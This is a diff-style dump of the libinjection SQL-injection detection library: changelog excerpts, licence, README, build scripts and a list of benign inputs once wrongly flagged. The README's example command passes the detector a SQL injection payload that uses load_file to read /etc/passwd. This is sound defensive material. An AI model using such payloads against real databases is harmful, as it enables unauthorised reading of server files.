language for accept/reject of fingerprints (i.e. manage fingerprints in
|
||||
script, not C code)
|
||||
* Improved parsing of various special cases in MySQL
|
||||
* Ban MySQL conditional comments. If we find them, it's marked as SQLi immediately.
|
||||
* Probably a bunch of other stuff too
|
||||
|
||||
# v2.0.4 2013-05-21 IMPORTANT
|
||||
|
||||
All users are advised to upgrade due to risk of DOS
|
||||
|
||||
## security
|
||||
* more fingerprints, more tests
|
||||
* Issue 34: fix infinite loop
|
||||
|
||||
# v2.0.3 2013-05-21
|
||||
|
||||
## security
|
||||
* Add variations on '1U(((', thanks @LightOS
|
||||
* Add automatically all variations on other cases of
|
||||
'parens padding'
|
||||
|
||||
# v2.0.2 2013-05-21
|
||||
|
||||
## security
|
||||
* Added fingerprint 'nU(kn' and variations, thanks to
|
||||
discussion with @ModSecurity .
|
||||
|
||||
# v2.0.1 2013-05-21
|
||||
|
||||
## security
|
||||
* Added fingerprint knknk, thanks @d0znpp
|
||||
|
||||
# v2.0.0 2013-05-17
|
||||
|
||||
Version 2 is more a software engineering release than SQLi.
|
||||
The API, the code, and filenames are improved for embedded
|
||||
use. Please see the README.md file for details on use.
|
||||
|
||||
## security
|
||||
|
||||
* Fix Issue30: detection of more small sqli forms with fingerprint "1c".
|
||||
* Fix Issue32: false positive of '*/*' of type 'oc' Thanks to @brianrectanus
|
||||
|
||||
## API Changes
|
||||
|
||||
BIG CHANGES
|
||||
|
||||
* File name changes. These are the only relevant files:
|
||||
* `c/libinjection.h`
|
||||
* `c/libinjection_sqli.c`
|
||||
* `c/libinjection_sqli_data.h`
|
||||
* `COPYING`
|
||||
* Just need to include `libinjection.h` and link with `libinjection_sqli_.c`
|
||||
* `sqlparse_private.h` and `sqli_fingerprints.h` are deprecated.
|
||||
Only use `#include "libinjection.h"`
|
||||
* API name changes `is_sqli` and `is_string_sqli` are now
|
||||
`libinjection_is_sqli` and `libinjection_is_string_sqli`
|
||||
* API change, `libinjection_is_sqli` now takes a 5th arg for callback data
|
||||
* API change, `libinjection_is_sqli` accepts `NULL` for arg4 and arg5
|
||||
in which case, a default lookup of fingerprints is used.
|
||||
* `sqlmap_data.json` now includes fingerprint information, so people making
|
||||
ports only need to parse one file.
|
||||
|
||||
## other
|
||||
|
||||
* Allow `clang` compiler (also in Jenkins, a build with clang and
|
||||
make-scan is done)
|
||||
* Optimizations should result in > 10% performance improvement
|
||||
for normal workloads
|
||||
* Add `sqlite3` special functions and keywords (since why not)
|
||||
|
||||
# v1.2.0 2013-05-06
|
||||
|
||||
## security
|
||||
* fix regression in detecting SQLi of type '1c'
|
||||
|
||||
##
|
||||
* improved documentation, comments, edits.
|
||||
|
||||
# v1.1.0 2013-05-04
|
||||
|
||||
## security
|
||||
|
||||
* Fix for nested c-style comments used by postgresql and transact-sql.
|
||||
Thanks to @Kanatoko for the report.
|
||||
* Numerous additions to SQL functions lists (in particular pgsql, transact-sql
|
||||
and ms-access functions)
|
||||
Thanks to Christoffer Sawicki (GitHub "qerub") for report on cut-n-paste error.
|
||||
Thanks to @ryancbarnett for reminder that MS-ACCESS exists ;-)
|
||||
* Adding of fingerprints to detect HPP attacks.
|
||||
* Algorihmically added new fingerprints to detect new _future_ sqli attacks. All of these
|
||||
new fingerprints have no been seen 'in the wild' yet.
|
||||
|
||||
## other
|
||||
|
||||
* Replaced BSD memmem with optimzed version. This eliminates all 3rd party code.
|
||||
* Added alpha python module (python setup.py install)
|
||||
* Added sqlparse_fingerprints.h and sqlparse_data.json to aid porting and embeddeding.
|
||||
* Added version number in sqlparse.h, based on
|
||||
http://www.python.org/dev/peps/pep-0386/#normalizedversion
|
||||
|
||||
# v1.0.0 2013-04-24
|
||||
|
||||
* retroactive initial release
|
||||
* all memory issues fixed
|
||||
|
32
libinjection/COPYING
Normal file
32
libinjection/COPYING
Normal file
|
@ -0,0 +1,32 @@
|
|||
Copyright (c) 2012-2016, Nick Galbreath
|
||||
All rights reserved.
|
||||
|
||||
Redistribution and use in source and binary forms, with or without
|
||||
modification, are permitted provided that the following conditions are
|
||||
met:
|
||||
|
||||
1. Redistributions of source code must retain the above copyright
|
||||
notice, this list of conditions and the following disclaimer.
|
||||
|
||||
2. Redistributions in binary form must reproduce the above copyright
|
||||
notice, this list of conditions and the following disclaimer in the
|
||||
documentation and/or other materials provided with the distribution.
|
||||
|
||||
3. Neither the name of the copyright holder nor the names of its
|
||||
contributors may be used to endorse or promote products derived from
|
||||
this software without specific prior written permission.
|
||||
|
||||
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
|
||||
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
|
||||
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
|
||||
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
|
||||
HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
|
||||
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
|
||||
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
|
||||
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
|
||||
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
|
||||
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
|
||||
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
|
||||
|
||||
https://github.com/client9/libinjection
|
||||
http://opensource.org/licenses/BSD-3-Clause
|
109
libinjection/README.md
Normal file
109
libinjection/README.md
Normal file
|
@ -0,0 +1,109 @@
|
|||
[![Build Status](https://travis-ci.org/client9/libinjection.svg?branch=master)](https://travis-ci.org/client9/libinjection)
|
||||
[![Coverage Status](https://coveralls.io/repos/client9/libinjection/badge.svg?branch=master&service=github)](https://coveralls.io/github/client9/libinjection?branch=master) [![license](https://img.shields.io/badge/license-BSD_3--Clause-blue.svg?style=flat)](https://raw.githubusercontent.com/client9/libinjection/master/COPYING)
|
||||
|
||||
libinjection
|
||||
============
|
||||
|
||||
SQL / SQLI tokenizer parser analyzer. For
|
||||
|
||||
* C and C++
|
||||
* [PHP](https://libinjection.client9.com/doc-sqli-php)
|
||||
* [Python](https://libinjection.client9.com/doc-sqli-python)
|
||||
* [Lua](/lua)
|
||||
* [Java](https://github.com/jeonglee/Libinjection) (external port)
|
||||
* [LuaJIT/FFI] (https://github.com/p0pr0ck5/lua-ffi-libinjection) (external port)
|
||||
|
||||
See
|
||||
[https://www.client9.com/](https://www.client9.com/)
|
||||
for details and presentations.
|
||||
|
||||
Simple example:
|
||||
|
||||
```c
|
||||
#include <stdio.h>
|
||||
#include <strings.h>
|
||||
#include <errno.h>
|
||||
#include "libinjection.h"
|
||||
#include "libinjection_sqli.h"
|
||||
|
||||
int main(int argc, const char* argv[])
|
||||
{
|
||||
struct libinjection_sqli_state state;
|
||||
int issqli;
|
||||
|
||||
const char* input = argv[1];
|
||||
size_t slen = strlen(input);
|
||||
|
||||
/* in real-world, you would url-decode the input, etc */
|
||||
|
||||
libinjection_sqli_init(&state, input, slen, FLAG_NONE);
|
||||
issqli = libinjection_is_sqli(&state);
|
||||
if (issqli) {
|
||||
fprintf(stderr, "sqli detected with fingerprint of '%s'\n", state.fingerprint);
|
||||
}
|
||||
return issqli;
|
||||
}
|
||||
```
|
||||
|
||||
```
|
||||
$ gcc -Wall -Wextra examples.c libinjection_sqli.c
|
||||
$ ./a.out "-1' and 1=1 union/* foo */select load_file('/etc/passwd')--"
|
||||
sqli detected with fingerprint of 's&1UE'
|
||||
```
|
||||
|
||||
More advanced samples:
|
||||
|
||||
* [sqli_cli.c](/src/sqli_cli.c)
|
||||
* [reader.c](/src/reader.c)
|
||||
* [fptool](/src/fptool.c)
|
||||
|
||||
VERSION INFORMATION
|
||||
===================
|
||||
|
||||
See [CHANGELOG](/CHANGELOG) for details.
|
||||
|
||||
Versions are listed as "major.minor.point"
|
||||
|
||||
Major are significant changes to the API and/or fingerprint format.
|
||||
Applications will need recompiling and/or refactoring.
|
||||
|
||||
Minor are C code changes. These may include
|
||||
* logical change to detect or suppress
|
||||
* optimization changes
|
||||
* code refactoring
|
||||
|
||||
Point releases are purely data changes. These may be safely applied.
|
||||
|
||||
QUALITY AND DIAGNOSITICS
|
||||
========================
|
||||
|
||||
The continuous integration results at
|
||||
https://travis-ci.org/client9/libinjection tests the following:
|
||||
|
||||
- [x] build and unit-tests under GCC
|
||||
- [x] build and unit-tests under Clang
|
||||
- [x] static analysis using [clang static analyzer](http://clang-analyzer.llvm.org)
|
||||
- [x] static analysis using [cppcheck](https://github.com/danmar/cppcheck)
|
||||
- [x] checks for memory errors using [valgrind](http://valgrind.org/)
|
||||
- [x] code coverage online using [coveralls.io](https://coveralls.io/github/client9/libinjection)
|
||||
|
||||
LICENSE
|
||||
=============
|
||||
|
||||
Copyright (c) 2012-2016 Nick Galbreath
|
||||
|
||||
Licensed under the standard [BSD 3-Clause](http://opensource.org/licenses/BSD-3-Clause) open source
|
||||
license. See [COPYING](/COPYING) for details.
|
||||
|
||||
EMBEDDING
|
||||
=============
|
||||
|
||||
The [src](https://github.com/client9/libinjection/tree/master/src)
|
||||
directory contains everything, but you only need to copy the following
|
||||
into your source tree:
|
||||
|
||||
* [src/libinjection.h](/src/libinjection.h)
|
||||
* [src/libinjection_sqli.c](/src/libinjection_sqli.c)
|
||||
* [src/libinjection_sqli_data.h](/src/libinjection_sqli_data.h)
|
||||
* [COPYING](/COPYING)
|
||||
|
33
libinjection/RELEASE-HOWTO.md
Normal file
33
libinjection/RELEASE-HOWTO.md
Normal file
|
@ -0,0 +1,33 @@
|
|||
# libinjection release howto
|
||||
|
||||
Comments and improvements welcome.
|
||||
|
||||
## Update the internal version number
|
||||
|
||||
in `src/libinjection_sqli.c` edit the definition
|
||||
|
||||
```c
|
||||
#define LIBINJECTION_VERSION "3.9.1"
|
||||
```
|
||||
|
||||
## Update the CHANGELOG.md file
|
||||
|
||||
There isn't much of specific format. It's not GNU changelog style. Just make sure it looks good in markdown.
|
||||
|
||||
## test and commit
|
||||
|
||||
Something like this
|
||||
```sh
|
||||
make test
|
||||
git commit -m 'VERSION'
|
||||
```
|
||||
|
||||
## run ./tags.sh
|
||||
|
||||
This will get the version number from the file above and create a local
|
||||
and remote tag.
|
||||
|
||||
## HELP!
|
||||
|
||||
I would be great to dump a src tarball on github releases.
|
||||
|
20
libinjection/configure-clang-asan.sh
Executable file
20
libinjection/configure-clang-asan.sh
Executable file
|
@ -0,0 +1,20 @@
|
|||
#!/bin/sh
|
||||
set -e
|
||||
#
|
||||
# adjust as needed for your clang setup
|
||||
#
|
||||
# -Wno-padded padding can change by OS/version this check is really
|
||||
# for embedded systems so it's ok to skip
|
||||
#
|
||||
# -Wno-covered-switch-default Don't warn if we have a switch that
|
||||
# covers all of an enum AND we have a default. enums are only loosely
|
||||
# typed, it's good to have a default: assert(0) in case someone does
|
||||
# a bad cast, etc also this conflicts with GCC checks.
|
||||
#
|
||||
# -Wdisabled-macro-expansion triggered on some linux libc headers involving
|
||||
# stdout and stdin definitions
|
||||
#
|
||||
make clean
|
||||
export CC=clang
|
||||
export CFLAGS="-g -ansi -fpic -O3 -Weverything -Wno-unused-macros -Wno-padded -Wno-covered-switch-default -Wno-disabled-macro-expansion -Werror -fsanitize=address"
|
||||
make -e check
|
20
libinjection/configure-clang.sh
Executable file
20
libinjection/configure-clang.sh
Executable file
|
@ -0,0 +1,20 @@
|
|||
#!/bin/sh
|
||||
set -e
|
||||
#
|
||||
# adjust as needed for your clang setup
|
||||
#
|
||||
# -Wno-padded padding can change by OS/version this check is really
|
||||
# for embedded systems so it's ok to skip
|
||||
#
|
||||
# -Wno-covered-switch-default Don't warn if we have a switch that
|
||||
# covers all of an enum AND we have a default. enums are only loosely
|
||||
# typed, it's good to have a default: assert(0) in case someone does
|
||||
# a bad cast, etc also this conflicts with GCC checks.
|
||||
#
|
||||
# -Wdisabled-macro-expansion triggered on some linux libc headers involving
|
||||
# stdout and stdin definitions
|
||||
#
|
||||
make clean
|
||||
export CC=clang
|
||||
export CFLAGS="-g -ansi -fpic -O3 -Weverything -Wno-unused-macros -Wno-padded -Wno-covered-switch-default -Wno-disabled-macro-expansion -Werror"
|
||||
make -e check
|
16
libinjection/configure-gcc-hardened.sh
Executable file
16
libinjection/configure-gcc-hardened.sh
Executable file
|
@ -0,0 +1,16 @@
|
|||
#!/bin/sh
|
||||
set -e
|
||||
#
|
||||
# See https://wiki.debian.org/Hardening for details
|
||||
#
|
||||
# -Wno-padded padding can change by OS/version this check is really
|
||||
# for embedded systems so it's ok to skip
|
||||
#
|
||||
# -Wno-covered-switch-default Don't warn if we have a switch that
|
||||
# covers all of an enum AND we have a default. enums are only loosely
|
||||
# typed, it's good to have a default: assert(0) in case someone does
|
||||
# a bad cast, etc also this conflicts with GCC checks.
|
||||
#
|
||||
make clean
|
||||
export CFLAGS="-g -O3 -pie -fPIE -fPIC -fstack-protector --param ssp-buffer-size=4 -Wall -Wextra -Wformat -Wformat-security -Werror -Wcast-align -Wshadow -Wpointer-arith -Wcast-qual -Wstack-protector -D_FORTIFY_SOURCE=2 -ansi -pedantic"
|
||||
make -e
|
11
libinjection/configure-gcov.sh
Executable file
11
libinjection/configure-gcov.sh
Executable file
|
@ -0,0 +1,11 @@
|
|||
#!/bin/sh
|
||||
set -e
|
||||
#
|
||||
# gprof build
|
||||
#
|
||||
make clean
|
||||
export CC=gcc
|
||||
export CFLAGS="-ansi -g -O0 -fprofile-arcs -ftest-coverage -Wall -Wextra"
|
||||
make -e
|
||||
|
||||
|
9
libinjection/configure-gprof.sh
Executable file
9
libinjection/configure-gprof.sh
Executable file
|
@ -0,0 +1,9 @@
|
|||
#!/bin/sh
|
||||
set -e
|
||||
#
|
||||
# gprof build
|
||||
#
|
||||
make clean
|
||||
export CFLAGS="-O2 -pg -ansi"
|
||||
make -e
|
||||
|
12
libinjection/data/README.md
Normal file
12
libinjection/data/README.md
Normal file
|
@ -0,0 +1,12 @@
|
|||
Files in this directory are sample input for SQLi or false positives
|
||||
|
||||
Lines that are empty or start with `#` ignored. Otherwise they should
|
||||
be URL-encoded "user input" as might be found in query string.
|
||||
|
||||
Each of the `sqli-\*.txt` files should generate a sqli match (with a few
|
||||
outliers).
|
||||
|
||||
The `false-positive.txt` file are inputs that in the process of
|
||||
development where falsely marked as sqli.
|
||||
|
||||
|
443
libinjection/data/false_positives.txt
Normal file
443
libinjection/data/false_positives.txt
Normal file
|
@ -0,0 +1,443 @@
|
|||
#
|
||||
# List of various inputs that failed and caused a false positive
|
||||
#
|
||||
24-7-TEAM
|
||||
A-LAST-MINUTE
|
||||
1/26/11
|
||||
TRUE#LAST
|
||||
1D0AA0A700000004/9GUH7NYWTMDHBAA CTFT0FG7/W4AWAABAAAAGK0WQAGHAAAAGAAABJMCGA=
|
||||
HTTP://WWW.TINYBELLESBLOG.COM/2011/11/2ND-ANNIVERSARY3K-FAN-GIVEAWAY.HTML#{"COLOR":"#2A1100","BACKGROUNDCOLOR":"WHITE","UNVISITEDLINKCOLOR":"#D860A7","FONTFAMILY":"GEORGIA, SERIF"}
|
||||
NOT ALL WHO WANDER
|
||||
ALL NATURAL SKIN CARE
|
||||
DAD TO BE
|
||||
UNIQUE TABLE RUNNER
|
||||
AS FOR ME AND MY HOUSE
|
||||
LOCK AND KEY
|
||||
1 BY 1 INCH PILLOWS
|
||||
SET WITH ENVELOPES
|
||||
FROM TO TAG CHRISTMAS
|
||||
3 BY 5 RECIPE CARDS
|
||||
3 TO 6 MONTHS
|
||||
BY ORDER OF THE MANAGEMENT
|
||||
A IS FOR ADORABLE
|
||||
WHERE IS GEORGE
|
||||
KEY TO MY HEART
|
||||
Y'ALL COME BACK NOW
|
||||
1950's dresses
|
||||
EC-2HM85288X8372881C
|
||||
4/_ZBKO2JKUCJC73C8KPIUDTJ3IMGM
|
||||
MATS 5" BY 7"
|
||||
I'M AFRAID SO. YOU'RE ENTIRELY BONKERS. BUT I'LL TELL YOU A SECRET THE BEST PEOPLE ARE" - ALICE
|
||||
HUGE BRASS CLOCK GEAR 2 3/4" - VINTAGE
|
||||
JACK-O'-LANTERN?
|
||||
7 AND A HALF
|
||||
7 FOR ALL MANKIND
|
||||
5 AND A QUARTER BY 8 INCHES
|
||||
40 AND FAB
|
||||
6 KEY CHAR
|
||||
3 FOR 20
|
||||
F AND A NECKLACE
|
||||
21 LONG IN
|
||||
FD AND C COSMETIC COLORANT
|
||||
2 OR 4 METAL BUTTONS
|
||||
13 IS A LUCKY NUMBER
|
||||
1 AND 1/2" BUTTON
|
||||
"DARE TO BE AWESOME":
|
||||
"ALASKA" + 1978
|
||||
10 DOUBLE LOOP SETS
|
||||
B IS FOR BLACK BY TATIANA SOROKA
|
||||
DANCIN' LIKE A ROBOT ON FIRE
|
||||
D AND D DICE
|
||||
BE TRUE 2 U
|
||||
B AND A PRINTS
|
||||
"SWEATER DRESS" AND "CHRISTMAS"
|
||||
SMALL "& SIGN
|
||||
9-2-5 BLACK PUMPS
|
||||
2-3/4 CELLO BAGS
|
||||
30-30-60 INVITE
|
||||
11-11-11 DAY POPPY
|
||||
4-1-7-CUEIPNJF1QIETPB8PQBVZ5
|
||||
1-1/8 PLUGS
|
||||
1 1/8 PLUGS
|
||||
1&1/8 PLUGS
|
||||
909-527-9247
|
||||
+1 (917) 666-0987
|
||||
(9178787873)
|
||||
(junk)
|
||||
"PINK ROSES" -DRESS -CLOTHES -SWEATER -COAT -JACKET -SKIRT -PANTS -SHIRT
|
||||
DRESS SIZE 20" -PATTERN -BABY
|
||||
"CROSS STITCH" -PDF -WOOL
|
||||
DRESS WITH HAT 18';
|
||||
2:1320316063:9-3Z6OMATJOWG5BO2JWF3I2S0QEN:XXMET8ACIJ1CVLEHB5MBBW-NPIEQ:0440D7CD127A7FBFCB9D17B01D38FB0A7C0EBC11
|
||||
HUGE BRASS CLOCK GEAR 2 3/4" - VINTAGE - STEAMPUNKVINTAGEFIND AT ETSY G194
|
||||
IN ORDER TO USE SEARCH
|
||||
BEGIN EACH DAY WITH LOVE
|
||||
SQL-3-RMGN_V-BBNGV40NGQRAGGZ
|
||||
IF-9-86MDXMB1Z-FINBSB4WIDF-B
|
||||
HTTP://CONTUBO.TV/VIDEOS/1949/2-BEST-MINIFALDAS,-TANGAS,CULONAS-MINISKIRTS"-BIKINIS-"SEXY-GIRLS"-BOOBIES-BOOTTIES
|
||||
GROUP UPDATE FACEBOOK LINK NOT PROVIDED
|
||||
CHRISTMAS STOCKING "NOT" STUFFER
|
||||
ORDER@ALLTHATSHEWANTS.US
|
||||
ALL@MKSAT.NET
|
||||
ALL NATURAL SHA
|
||||
WHERE IS THE SHOW
|
||||
"ALASKA" + 1978
|
||||
SMALL "&" SIGN
|
||||
50%2526%252339%253Bs
|
||||
VINTAGE CARVED BEAD'" -LUCITE -PLASTIC
|
||||
pr_shop%22%3EMamaBearBabyWear%3C/a%3E
|
||||
poem+'if'
|
||||
CRAFT SHOW SET
|
||||
DIARY WITH LOCK
|
||||
CLIP ON READ
|
||||
CLOCK WITH KEYS
|
||||
THERE IS NOT PLACE LIKE HOME
|
||||
BASE; SET SWAROVSKI
|
||||
LED -(ZEPPELIN)
|
||||
LIFE IS NOT ABOUT WAITING FOR THE STORM TO PASS
|
||||
70" ROUND TABLE CLOTH
|
||||
"CASE"
|
||||
"RIGHT ON"
|
||||
"NOT ALL WHO WANDER"
|
||||
V1_OTHER_1"><IMG CLASS="SIZE-FULL WP-IMAGE-2764
|
||||
CAT2_GALLERY_20">ETSY</A
|
||||
OUR FIELD BAG IS INTENDED AS A DAILY WORKHORSE, A CROSSOVER BETWEEN A TRADITIONAL ENGLISH FISHING BAG AND AN URBAN MESSENGER BAG. DURABLE CONSTRUCTION AND PRACTICAL FEATURES ALLOW THE BAG TO EXCEL AT CARRYING GEAR BOTH OUTDOORS AND TO THE OFFICE. THE FIELD BAG IS CONSTRUCTED FROM THE HIGHEST QUALITY MATERIALS: 22 OZ WAXED TWILL FABRIC, HORWEEN LEATHER, AND THREAD ARE OF US ORIGIN. WEBBING AND MOST OF OUR BRASS HARDWARE IS SOURCED FROM THE UK. RIRI ZIPPERS ARE MADE IN SWITZERLAND. FEATURES INCLUDE A ROOMY MAIN COMPARTMENT, TWO BELLOWS POCKETS, AND ONE LARGE POCKET ACROSS THE BACK OF THE FIELD BAG. A SOLID BRASS RING PROVIDES AN EASY ATTACHMENT POINT FOR KEYS OR FISHING NET. LEATHER STRAP, ROLLER BUCKLE, AND A HEAVY-DUTY ZIPPER SECURE THE BAG'S CONTENTS. EDGES ARE BOUND IN WAXED COTTON TAPE, ALL STRESS POINTS ARE BAR-TACKED OR RIVETED, AND EACH BAG IS HAND-NUMBERED. EASILY FITS LAPTOPS (UP TO 15") IN THE OWNER'S OWN SLEEVE. DIMENSIONS: 16" X 12.75" X 4"
|
||||
ALLENTOWN, () PA UNITED STATES
|
||||
/SEARCH/SUPPLIES?SEARCH_SUBMIT=&Q=STAR COPPER BLANK 1/2"&ORDER=MOST_RELEVANT&SHIP_TO=US&VIEW_TYPE=GALLERY
|
||||
/SEARCH/HANDMADE/ART/PRINT?SEARCH_QUERY=14 X 18"&SEARCH_SUBMIT=&SEARCH_TYPE=CATEGORY&CATEGORY=ART&PAGE=3
|
||||
/SEARCH/HANDMADE?SEARCH_SUBMIT=&Q=WOODEN EMBROIDERY HOOP (3")&ORDER=MOST_RELEVANT&SHIP_TO=US&VIEW_TYPE=GALLERY
|
||||
GREEN...GREEN...GREENISH))) BY JULIA
|
||||
BRIDAL SHOWER INVITATION RECIPE CARDS'===
|
||||
/SEARCH/HANDMADE?SEARCH_SUBMIT=&Q="<3"&VIEW_TYPE=GALLERY&SHIP_TO=FR
|
||||
/SEARCH/HANDMADE?Q=8.9" CASE&VIEW_TYPE=GALLERY&SHIP_TO=US
|
||||
/SEARCH_RESULTS.PHP?SEARCH_TYPE=ALL&INCLUDES[0]=TAGS_EXACT&SEARCH_QUERY=RED SHOES 9"&PAGE=1&REF=RELATED
|
||||
7/" ALUMINUM DISC
|
||||
"MOD" "KITCHEN"
|
||||
'M M L"\\ INITIALS
|
||||
I' IS NOT A PLASTIC BAG
|
||||
;EACH
|
||||
;ON
|
||||
IPHONE CASE 4 CASE
|
||||
LAPTOP CASE 13 AND PHONE
|
||||
IPAD -4 CASE
|
||||
EP-2 CASE
|
||||
ECID=15&
|
||||
"///
|
||||
CARD IS 4 AND A HALF X 5 AND A HALF INCHES AND IS AVAILABLE IN A LARGER SIZE AS WELL
|
||||
2012 WRITE ON CALENDAR
|
||||
1960 OUTER SPACE METAL LUNCH BOX PAIL TIN DOME TOP 239-S
|
||||
MACBOOK CASE 13 -IPHONE -IPAD
|
||||
DUPIONI -UNIQUE -"-UNIQUE -FAT -FQ -RIBBON -TRIM -POLY -POLYESTER
|
||||
LAPTOP CASE 14'
|
||||
"UNIQUE" PRINTABLE WEDDING
|
||||
SILVER BRACELET "FORCE"
|
||||
MOVIN' ON T-SHIRT
|
||||
77921690/TURQUOISE-NATURAL-TU
|
||||
"WRITE" DESIGN
|
||||
"WHERE'S GEORGE"
|
||||
"UNIQUE" PRINTABLE WEDDING
|
||||
"UNION" BY ROBERT F
|
||||
"TABLE"
|
||||
"TRUE"
|
||||
"ON" WHITE GREEN
|
||||
"CREATE" STERLING GOLD
|
||||
"CHANGE" NECKLACE
|
||||
CHAIN MEASURES 18" AND IS COMPOSED COMPLETELY OUT OF BRASS
|
||||
TAN (WATER RESISTANT INSULATED) MESSENGER
|
||||
HAND-STITCHED MACBOOK AIR / MACBOOK PRO LEATHER SLEEVE (13") WITH FREE MONOGRAMMING
|
||||
1/4"-1/2" WIDE RIBBON
|
||||
1/4"-1" WIDE RIBBON
|
||||
BILLEEVERSBOUTIQUE , BROWNING "LIKE"
|
||||
'-"8 TRACK" PLAYER
|
||||
"AND WHEN THE KIDS ARE OLD ENOUGH"
|
||||
"AND WHEN THE KIDS ARE OLD
|
||||
5-ELGIFPIS-0LGAJJZ-NV54YKIS4
|
||||
"WOOD" AND "SIGN" AND "POLKA DOTS"
|
||||
TAN
|
||||
INFINITY LOOP SCARF
|
||||
INFINITY LOOP
|
||||
7 DEC 01
|
||||
CARDS @ TWITTER
|
||||
1;1;1;CONTROL;0;0;1;
|
||||
{%25 $NUM_VIEWS|STRING_FORMAT:"%25D" %25} VUES
|
||||
7 AND A HALF
|
||||
1060 OR 70S
|
||||
18 CREATE GOLD
|
||||
2 LOOP CONNECTORS
|
||||
7 AND HALF
|
||||
8 LOOP BOW
|
||||
8 OR 9 WLV
|
||||
00 AND 3
|
||||
10.00 AND UNDER
|
||||
102 TABLE CLOTH
|
||||
10 OR LESS
|
||||
TRUE-CUT
|
||||
1.25 READ BUTTONS
|
||||
"ON SALE ON SALE"
|
||||
(NEW AND UNIQUE)
|
||||
NEW AND UNIQUE)
|
||||
1 REAL FEATHER AND 1 PETITE REAL SHELL
|
||||
(DICKEY DICKIE*)
|
||||
(1297-MR)
|
||||
1297-MR),
|
||||
(BRASS) PEN -BULLET
|
||||
(CERAMIC OR POTTERY) MUGS
|
||||
3/4 FEAR AND LOATHING
|
||||
1 FEAR AND LOATHING
|
||||
9/16 PLUGS AND TUNNELS
|
||||
78881214/LARGE-PINK-QUARTZ-DROPS-AND-22K-GOLD
|
||||
"RETURN ADDRESS LABELS" STICKER
|
||||
"ON THE WAY"
|
||||
"ON THE AIR" SIGN
|
||||
20 SET 3/4
|
||||
20 SET 3
|
||||
"CREATE A CRITTER"
|
||||
"INTO THE WILD"
|
||||
"ON FIRE FOR" WHITE GREEN
|
||||
"FOR BETTER OR WORSE"
|
||||
(ANTIQUE, VINTAGE) QUILT
|
||||
ANTIQUE, VINTAGE) QUILT
|
||||
(TRUMPTON, IVOR, CLANGERS, POOH)
|
||||
TRUMPTON, IVOR, CLANGERS, POOH)
|
||||
OR-9-9WYTCZT313XRCN2UV62MBE1
|
||||
IS-8-RJYG1PGMI0GTBH2XDV8AKGZ
|
||||
(RUSTIC OR ORGANIC) EVERYDAY NECKLACE
|
||||
RUSTIC OR ORGANIC) EVERYDAY NECKLACE
|
||||
BLAH <A HREF="/PATH1/PATH2/PATH3">FOO</A>
|
||||
BLAH <A HREF="FOO.HTML">FOO</A>
|
||||
BLAH <A HREF="/FOO.HTML">FOO</A>
|
||||
RSCHMIDT @FPMC-WILLMAR/COM
|
||||
XSERVING"; ";PLATTER"; ";VINTAGE";
|
||||
/SEARCH/?INCLUDES=&SEARCH_QUERY=TYPOGRAPHY+PRINT+"WITH+YOU"&REF=RELATED&PAGE=1
|
||||
LLLLLLLLLLLLLLLLLLLLLLLLLLLLLKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;''''''''''''''''''''''''''''''''''''''''''''''';;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;LLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKL;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;';;LK
|
||||
SCRAPBOOK PAPER PACK (8.5X11"-300 DPI) --
|
||||
SWIRLS DIGITAL SCRAPBOOK PAPER PACK (8.5X11"-300 DPI) -- 10 DIGITAL PAPERS -- 122
|
||||
HTTP://WWW.MECKMOM.COM/MMDL/CHRISTMAS BUDGET PLANNER.PDF';" HREF="HTTP:/WWW.MECKMOM.COM
|
||||
1.5 WITH 1/2 INCH LOOP END LOBSTER
|
||||
60;S MOD DRESSES
|
||||
7" #2 CIRCULAR NEEDLE
|
||||
9/PLUGS AND TUNNELS
|
||||
9/16PLUGS AND TUNNELS
|
||||
"NOT ON FACEBOOK"
|
||||
"#2 MOM"
|
||||
80%25 ACRYLIC AND 20%25 WOOL
|
||||
35%25 COTTON AND 65%25 POLYESTER.
|
||||
5685587||ORDER=||SECTION_ID=||PAGE=2
|
||||
{%25 $SENDER_FULL_NAME %25} BLAH BLAH BLAH {%25 $CONVO_SEND_DATE|DATE_FORMAT:'%25B %25D, %25Y' %25}.
|
||||
UJUUUI8UJKPKJMMJUMNMJUJMMNNJUJMNJJJMNJKJMJJKBJ9I8UJJMMNJNJJJJJJNNKJNMKUJJUNKJJJNJNJKJJJJJJJJJMNJJJJJKJIJJJJJJJJJJJJJJJJJGGGFSAQWERTYUIOP[]';LKGFDSAZXBNM,.
|
||||
BAMBOO CHARCOAL SOAP 1 '#
|
||||
BLUE BROWN -BABY -TODDLER -CCBCUSTOMDRESSES' -SHOES -SANDLES -HEEL --INFANT -CHILD -CHILDS -CHILDRENS -KID -KIDS -BOYS -BOY -MEN -MENS
|
||||
BLUE BROWN -BABY -TODDLER -CCBCUSTOMDRESSES' --INFANT -CHILD -CHILDS -CHILDRENS -KID -KIDS -BOYS -BOY -MEN -MENS
|
||||
<SPAN CLASS="SHOW-TEXT">REGARDEZ</SPAN>
|
||||
BOOKMAR';[K]]
|
||||
WOOL AND ACRYLIC FOR SOFTNESS
|
||||
01/DEC/2011:20:45:25
|
||||
0;1;0;1;0
|
